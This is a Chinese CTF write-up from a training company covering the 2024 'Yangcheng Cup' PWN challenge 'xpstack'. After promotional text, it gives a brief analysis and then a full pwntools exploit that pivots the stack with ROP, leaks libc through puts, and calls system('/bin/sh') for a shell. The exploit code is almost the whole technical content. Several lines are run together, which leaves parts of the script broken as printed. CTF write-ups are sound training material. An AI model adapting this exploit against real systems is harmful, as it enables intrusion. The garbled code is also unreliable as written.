2024年“羊城杯”粤港澳大湾区网络安全大赛 PWN部分
Author:Ns100kUp
From:极安云科-服务中心
Data:2024/08/27
Copyright:本内容版权归属极安云科,未经授权不得以任何形式复制、转载、摘编和使用。
培训、环境、资料、考证
公众号:Geek极安云科
网络安全群:624032112
网络系统管理群:223627079
网络建设与运维群:870959784 极安云科专注于技能提升,赋能
2024年广东省高校的技能提升,受赋能的客户院校均获奖!
2024年江苏省赛一二等奖前13名中,我们赋能客户占五支队伍!
2024年湖南省赛赋能三所院校均获奖!
2024年山东省赛赋能两所院校均获奖!
2024年湖北省赛赋能参赛院校九支队伍,共计斩获一等奖2项、三等奖7项!
1.xpstack
存在0x10大小的溢出
没开canary
直接rop构造栈迁移,先leak libc 然后让system binsh
exp
from pwn import *
from pwn import p64, u64sh = process("./pwn")
sh = remote('', )
elf=ELF("./pwn")
libc = elf.libc
read_begin = 0x4006C4bss_addr = 0x601010payload = b'a'*0x30 + p64(bss_addr+48) + p64(read_begin)
sh.sendafter("Can you grasp this little bit of overflow?\n",payload)
pop_rdi = 0x0000000000400773
pop_rsi = 0x0000000000400771
pop_rsp = 0x000000000040076dpause()
payload = p64(pop_rsi) + p64(bss_addr+0x400) + p64(0) + p64(elf.plt['read'])
payload += p64(pop_rsp) + p64(0x601410)
payload += p64(bss_addr - 8) + p64(0X4006DB)
sh.send(payload)pause()
payload = p64(0x12345678)*3
payload += p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(0x4006B0)
sh.send(payload)libc_base = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.symbols['puts']
print(hex(libc_base))bin_sh_addr = libc_base+next(libc.search(b"/bin/sh"))
payload = b'a'*0x30 + p64(bss_addr+48) + p64(read_begin)
sh.sendafter("Can you grasp this little bit of overflow?\n",payload)
pause()
payload = p64(pop_rsi) + p64(bss_addr+0x800) + p64(0) + p64(elf.plt['read'])
payload += p64(pop_rsp) + p64(0x601810)
payload += p64(bss_addr-8) + p64(0X4006DB)
sh.send(payload)pause()
payload = p64(0x12345678)*3
payload += p64(0x4006DC) + p64(pop_rdi) + p64(bin_sh_addr) + p64(libc.symbols['system'] + libc_base)
sh.send(payload)sh.interactive()
)
